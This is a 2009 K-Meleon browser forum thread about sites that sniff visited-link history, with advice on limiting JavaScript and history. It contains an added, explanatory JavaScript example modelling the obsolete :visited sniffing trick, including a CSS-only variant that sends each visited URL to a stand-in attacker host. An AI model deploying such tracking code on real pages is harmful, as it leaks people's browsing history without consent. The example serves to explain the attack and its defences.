General :  K-Meleon Forum
Vulnerabilities
Posted by: AirSpirit
Date: April 23, 2009 11:14PM

http://startpanic.com/
This site can tell you what sites you've visited using browser vulnerabilities. K-Meleon is vulnerable too. sad smiley

Re: Vulnerabilities
Posted by: nico
Date: April 24, 2009 01:46AM

Wait for the K-Meleon experts.

http://bcheck.scanit.be/bcheck/


Re: Vulnerabilities
Posted by: panzer
Date: April 24, 2009 02:11AM

Our experts always find a way to calm us down. smiling smiley

Re: Vulnerabilities
Posted by: Yogi
Date: April 24, 2009 02:43AM

I'm no expert let alone of K-Meleon.
Nevertheless:

Quote
AirSpirit
This site can tell you what sites you've visited using browser's vulnerabilities.

Nope, no vulnerability is involved. You can tell which sites have been visited (if JavaScript is enabled in your browser) only by comparing against a list of sites the webmaster of the snooping site has prepared.
You could avoid this kind of snooping by disabling JavaScript or (if browser settings make it possible) by disabling coloured visualisation of visited links.

After rethinking:
Meddling with CSS won't help. The only countermeasure would be to turn off JavaScript, or at least I thought so until I saw and tested the CSS hack Fred referred to.

However we shouldn't forget about AJAX which is capable of even more nasty things.

@ nico

At least this is what I get with the settings (+ Proxomitron) I use on a regular basis.


This however shouldn't mean at all that K-Meleon wouldn't crash with default settings.



Edited 2 time(s). Last edit at 04/25/2009 05:15AM by Yogi.

Re: Vulnerabilities
Posted by: nico
Date: April 24, 2009 03:15AM

My settings + the immunize function of Spybot-S&D and SpywareBlaster.



Re: Vulnerabilities
Posted by: disrupted
Date: April 24, 2009 05:51AM

Actually any site can trace back your tracks with good JavaScript. This one was lousy. I left it uhing and ohing for like half an hour and went to work while it humped my processor, and all it could find were the last and first entries in history.

If you're paranoid, you can disable JS in the global policy and enable JS for just the sites you surf frequently and trust, using the policies manager.
http://kmeleon.sourceforge.net/forum/read.php?1,91203

And if you're really paranoid, you can do your online banking, eBay purchasing etc. in 'privacy mode':
http://kmeleon.sourceforge.net/forum/read.php?1,83391,83558



Re: Vulnerabilities
Posted by: Yogi
Date: April 24, 2009 06:24AM

No matter how paranoid someone might be, that's not a security risk.
If the snooping webmaster has a list containing e.g.:
www.bigboobies.gov
which I've visited, then he will know that I was visiting that site.
Even so, he can't see that I visited e.g.:
www.bigboobies/logme_in/pass_ohoh/haleluia.gov

Not to mention that all purchases are done over a secure/encrypted connection.

Re: Vulnerabilities
Posted by: caktus
Date: April 24, 2009 09:38AM

Vulnerabilities?

Often vulnerabilities are caused by the dope behind the weapon rather than the weapon itself. tongue sticking out smiley

Charlie

~~If it ain't broke, why screw it up?~~


Re: Vulnerabilities
Posted by: xray
Date: April 24, 2009 07:27PM

JS is mainly disabled on this browser. Still, if every honk site is able to trace the history of Gecko/KM via JS, then something is really wrong with its architecture, period.

Re: Vulnerabilities
Posted by: disrupted
Date: April 24, 2009 09:10PM

Quote
caktus
Vulnerabilities?

Often vulnerabilities are caused by the dope behind the weapon rather than the weapon itself. tongue sticking out smiley
grinning smiley So true.

Re: Vulnerabilities
Posted by: Fred
Date: April 24, 2009 09:16PM

Reading out part of the history is probably possible with any browser that has JavaScript enabled. But it seems only possible to compare against a prewritten list of sites, so only the sites included in this list can be found. It seems even to be possible without JavaScript enabled, using a CSS hack, as is described here:

http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/

but still only for sites in a prewritten list.

But this would work only if there is a browser history present. For example, it is not possible for my variation KM18121forCD-Kiosk, which has no history and no cache, because its purpose is to work from a CD or stick without writing anything on the used computer. But you can also set, for all variations, your history to work for 0 days, to disable history snooping, although this would make it less comfortable to search your history yourself.

Allowing JavaScript to only a few websites where it is really necessary, be it using NoScript or simply an on/off button, would also reduce the risk and is generally not a bad idea, because many malware actions work only with JavaScript enabled, and a site working with JavaScript only is basically bad in my personal opinion.

Fred
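The mechanism Yogi and Fred describe above (a prepared candidate list, checked one URL at a time against the browser's :visited state, with a JavaScript variant and a script-free CSS variant) modelled offline, as an added example that is not from this thread and not K-Meleon's or anyone's real sniffing code. The candidate list, the history set and the beacon host `attacker.invalid` are constructed for the demo; the "browser" is a stub that answers the one question a 2009-era `getComputedStyle()` answered, namely whether a link currently matches `:visited`. Browsers closed both channels around 2010 (computed style now lies about :visited, and :visited rules can no longer load images), so the real probe markup this builds no longer leaks anything in a current browser; the point is to show why only exact URLs on the list are ever found and why an empty history defeats it.

```javascript
// Added example, not code from the K-Meleon forum thread or the K-Meleon
// project. Models 2009-era :visited history sniffing against a stub browser.

// Constructed probe list. The snooping page can only ask about URLs it
// already has; nothing outside this list can ever be discovered.
const CANDIDATES = [
  "http://www.example.com/",
  "http://www.example.com/account/",
  "http://mail.example.net/",
  "http://forum.example.org/",
];

function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// Markup the snooping page would inject for the JavaScript variant: one
// hidden-looking link per candidate, plus a stylesheet that gives :visited
// links a colour the script can recognise.
function buildJsProbe(candidates) {
  const css =
    "a.probe:link { color: rgb(0, 0, 255); }\n" +
    "a.probe:visited { color: rgb(255, 0, 0); }";
  const html = candidates
    .map((u, i) => `<a class="probe" id="p${i}" href="${escapeAttr(u)}"></a>`)
    .join("\n");
  return { css, html };
}

// JavaScript variant. In 2009 getComputedStyle(link).color reported the
// :visited colour; `computedColor(url)` stands in for that call.
function sniffWithJs(candidates, computedColor) {
  return candidates.filter((u) => computedColor(u) === "rgb(255, 0, 0)");
}

// CSS-only variant (the ha.ckers.org trick): no script at all. One :visited
// rule per candidate loads a background image from the attacker's server,
// so the server's access log becomes the history leak.
function buildCssOnlyProbe(candidates, beaconBase) {
  return candidates
    .map(
      (u, i) =>
        `#p${i}:visited { background-image: url(${beaconBase}?hit=${encodeURIComponent(u)}); }`
    )
    .join("\n");
}

// Stub browser. History is an exact-URL set, which is what :visited
// matching is: "http://www.example.com/account/settings" in history does
// not make "http://www.example.com/account/" visited.
function makeBrowser(historyUrls) {
  const history = new Set(historyUrls);
  const visited = (url) => history.has(url);
  return {
    computedColor: (url) => (visited(url) ? "rgb(255, 0, 0)" : "rgb(0, 0, 255)"),
    // Apply the CSS-only probe: every rule whose link is :visited triggers
    // one image fetch. Returns the beacon URLs the attacker would see logged.
    fetchBeacons(css, candidates) {
      const hits = [];
      const rule = /#p(\d+):visited \{ background-image: url\(([^)]+)\); \}/g;
      let m;
      while ((m = rule.exec(css)) !== null) {
        const target = candidates[Number(m[1])];
        if (target !== undefined && visited(target)) hits.push(m[2]);
      }
      return hits;
    },
  };
}

// End-to-end run of both variants against one constructed history.
function demo(historyUrls) {
  const browser = makeBrowser(historyUrls);
  const jsHits = sniffWithJs(CANDIDATES, browser.computedColor);
  const css = buildCssOnlyProbe(CANDIDATES, "http://attacker.invalid/log");
  const beaconHits = browser.fetchBeacons(css, CANDIDATES);
  return { jsHits, beaconHits };
}
```

Run `demo([...])` with a history that contains `http://www.example.com/account/settings`: the deeper page is never reported, only the exact list entries are, which is Yogi's point about logged-in URLs; run it with `demo([])` (Fred's "history for 0 days", or a kiosk build with no history) and both variants come back empty.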

Re: Vulnerabilities
Posted by: guenter
Date: April 24, 2009 10:48PM

Quote
xray
if every honk-site is able to trace the history of gecko/km via js then something is really wrong with its architecture

It's a trick relying on the cache: every browser tends to have and use a cache. smiling smiley
It saves bandwidth.

First they used cookies; when users became aware, they used web bugs, JS, cache and IPs for tracking.

They want their interest, behaviour and movement statistics for e-commerce.

Re: Vulnerabilities
Posted by: desga2
Date: April 25, 2009 01:26AM

http://bcheck.scanit.be/bcheck/
It isn't a reliable test for current vulnerabilities, because all K-Meleon 1.5.x versions with the default config and the Flash 10 plugin pass the test, but Firefox 2.0.0.20 passes the test too. (Option: "Run all available tests")

K-Meleon in Spanish



Edited 2 time(s). Last edit at 04/25/2009 01:28AM by desga2.

Re: Vulnerabilities
Posted by: AirSpirit
Date: April 28, 2009 01:35AM

Thanks for your answers smiling smiley
Probably I'll install NoScript for K-Meleon.

Re: Vulnerabilities
Posted by: nico
Date: April 28, 2009 02:20AM

Even with Privoxy I was not saved. surprised smiley



Re: Vulnerabilities
Posted by: nico
Date: April 28, 2009 03:01AM

Quote
Fred
because many malware actions work only with javascript enabled, and a site working with javascript only is basically bad in my personal opinion.

Flashblock and my weakness sad smiley

Re: Vulnerabilities
Posted by: Fred
Date: April 28, 2009 07:02AM

To watch YouTube Flash videos without JavaScript you can use the macro OnlyVideo.kmm.

http://kmeleon.sourceforge.net/wiki/KmmOnlyVideo

This right-click macro opens and plays the Flash video in a new window. JavaScript can be turned off. With JavaScript off or NoScript, most other Flash will not play, and can probably at least not be dangerous if it plays without JavaScript. To play a specific Flash video from a trusted site, allow it as the case arises in NoScript, or turn on JavaScript for the site.

Fred
